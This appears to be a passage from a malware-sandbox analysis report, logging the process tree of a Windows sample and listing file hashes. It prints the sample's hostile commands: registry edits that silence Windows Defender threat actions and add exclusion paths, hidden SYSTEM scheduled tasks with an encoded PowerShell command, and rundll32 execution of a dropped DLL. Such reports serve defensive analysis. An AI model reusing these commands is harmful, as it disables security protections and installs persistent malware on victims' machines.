C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1720
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2848
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCxyEYsLPoBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCxyEYsLPoBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYxEjiIKDDwYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYxEjiIKDDwYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WrbOaSOTQfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WrbOaSOTQfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jNivjIkKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jNivjIkKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BsYOAUalmtuIFlVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BsYOAUalmtuIFlVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SVXwGszHTIpIGNNH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SVXwGszHTIpIGNNH\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:323⤵PID:3204
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:324⤵PID:3608
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:643⤵PID:2404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:323⤵PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:643⤵PID:4304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:323⤵PID:4168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:643⤵PID:3428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:323⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:643⤵PID:4156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:323⤵PID:456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:643⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BsYOAUalmtuIFlVB /t REG_DWORD /d 0 /reg:323⤵PID:3764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BsYOAUalmtuIFlVB /t REG_DWORD /d 0 /reg:643⤵PID:4048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx /t REG_DWORD /d 0 /reg:323⤵PID:212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx /t REG_DWORD /d 0 /reg:643⤵PID:32
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SVXwGszHTIpIGNNH /t REG_DWORD /d 0 /reg:323⤵PID:4144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SVXwGszHTIpIGNNH /t REG_DWORD /d 0 /reg:643⤵PID:4308
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJImlIBuC" /SC once /ST 03:37:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJImlIBuC"2⤵PID:2764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJImlIBuC"2⤵PID:1720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyQsokuHCPHrPIKjm" /SC once /ST 15:53:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\oaZcBNQ.exe\" nk /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyQsokuHCPHrPIKjm"2⤵PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4152
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4604
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:944
-
C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\oaZcBNQ.exeC:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\oaZcBNQ.exe nk /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1040 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bGKvUxYEKJhmpNiCsB"2⤵PID:4380
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4812
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2548
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1752
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jNivjIkKU\ERuqty.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ydofTeYvCFRiBkl" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ydofTeYvCFRiBkl2" /F /xml "C:\Program Files (x86)\jNivjIkKU\UQizKzN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ydofTeYvCFRiBkl"2⤵PID:404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ydofTeYvCFRiBkl"2⤵PID:3524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LBuWRqeXoiHTKS" /F /xml "C:\Program Files (x86)\HCxyEYsLPoBU2\jHIYxfh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oqzULkuhADdZu2" /F /xml "C:\ProgramData\BsYOAUalmtuIFlVB\gwBfnPx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uNiyNhNrKWiTQIMhb2" /F /xml "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\mRAOZot.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UeTWhQAkQYvpBfdsNev2" /F /xml "C:\Program Files (x86)\VYxEjiIKDDwYC\TBuwYoa.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BTdQtQCLlbasEjBtK" /SC once /ST 02:34:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SVXwGszHTIpIGNNH\LHIoSnTa\EToUTjc.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BTdQtQCLlbasEjBtK"2⤵PID:1940
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4532
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3668
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2208
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GyQsokuHCPHrPIKjm"2⤵PID:4564
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\LHIoSnTa\EToUTjc.dll",#1 /site_id 5254031⤵PID:3460
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\LHIoSnTa\EToUTjc.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3784 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BTdQtQCLlbasEjBtK"3⤵PID:2344
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59f9d5ad3f4d284636d3c7241e2575ef7
SHA1b0e1e3d25e386c69444c70a3bafb3e3fe56fab6f
SHA256ea8fa54c0c8a9c33b16479ae4b8ae0bda719f7627db5dee7a595208b6f49e125
SHA512a6da732ada5d01c68ebfae1ed2dcf9fdcf422dd6dfefd1e55edaf3aedbdf2619cb3652a7b927e1d698819d51268129f15a3dc9620e4cd36c14dde2ff82efd035
-
Filesize
2KB
MD58f75c356aa6b5ba5f755cfe854474200
SHA115bdff032bd15338bb5556411efea25de2259329
SHA2565c77072502f74d8eeba621152124045eddb86a25e1b76d232888d22be3bdc8b4
SHA512dba33aca81264a98d69fe9c680af1f5d6d8bb216c7d7afb1956997586be6e6bcf65d271109594ad49b55b0b740fd07313b7ebadfb16a8fe40293b7d30aa81ece
-
Filesize
2KB
MD57a4da22de00aff42dc94e82c99bbdbc9
SHA1bc0bb52577eed19ebb7e8b8909f4743319305746
SHA2562b619dce0da22ecb0e420de637654800ff24ceffeeaa12bb1f61e97f03dd49b2
SHA51206d834cf5ecc4e3fb55fa78eed7c9b949157ed485ffefee21dd0c8b72d8b2e4bee2f6a283004cfd50ead8ddb2e6c2f5c3585d656f0ebe0ce747638e347a56367
-
Filesize
2KB
MD562e005575781fa6fb6847b0fcff90045
SHA13dbd75ff6234d6f2a159f730af7290fd93d5b238
SHA256be9c7b30b64cc5a420456acc3bbfd94b6ede6566bff4430b6bbe966f5427ff68
SHA5125b47ab85876a0c0b92c776d269973699c498c53b3e70b73dd24e9535507c74855252e85bbd64142bcb6623a0a6262901cf8d56a41f1c1407f68a515d8c375fd7
-
Filesize
2KB
MD58e3a0d5523b5f65c2127188d75382f09
SHA189384addb7fee8e928de58980528b54ccb30e93b
SHA256eefd7d042e8873753747062efbca78571aba8aacb5c558c7e602a21ebd8aed94
SHA512a8730c80858448f891382d2b97c6e90bfb141564e85484752c7138a7cb6fe6faff41f9fb80dcc7c806068a03e616c9e6ab4c2231c44b13bd507d46346ed03ffd
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
6.3MB
MD5fe4f99cf505c8661a56fa1523d821fbd
SHA115946ca3b9e486416ab584293c6e3a347d8e1a1c
SHA2560ea3061c4b6624937c936aed6536320ad8ef2c6616ee8ffd6046cce3dd8d9977
